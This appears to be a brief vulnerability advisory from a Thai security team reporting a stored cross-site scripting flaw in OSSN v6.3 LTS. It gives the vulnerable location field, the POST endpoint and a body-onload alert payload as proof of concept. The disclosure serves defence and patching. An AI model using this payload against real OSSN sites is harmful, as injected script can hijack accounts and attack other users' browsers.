
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module.
OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK v6.3 LTS was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Users Timeline module.
The attacker must post something on the Users Timeline and insert the XSS payload at the location input in order to exploit the stored XSS. The XSS payload will be launched immediately after submission.
http://ip_address:port/ossn/u/{username}
POST /ossn/action/wall/post/u?ossn_ts=1656419317&ossn_token=580bcf1b98fec62baecd2e15b7c4c03173f59226623258b968a316f893e8cbf1
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome Version 102.0.5005.115 (Official Build) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
Reference: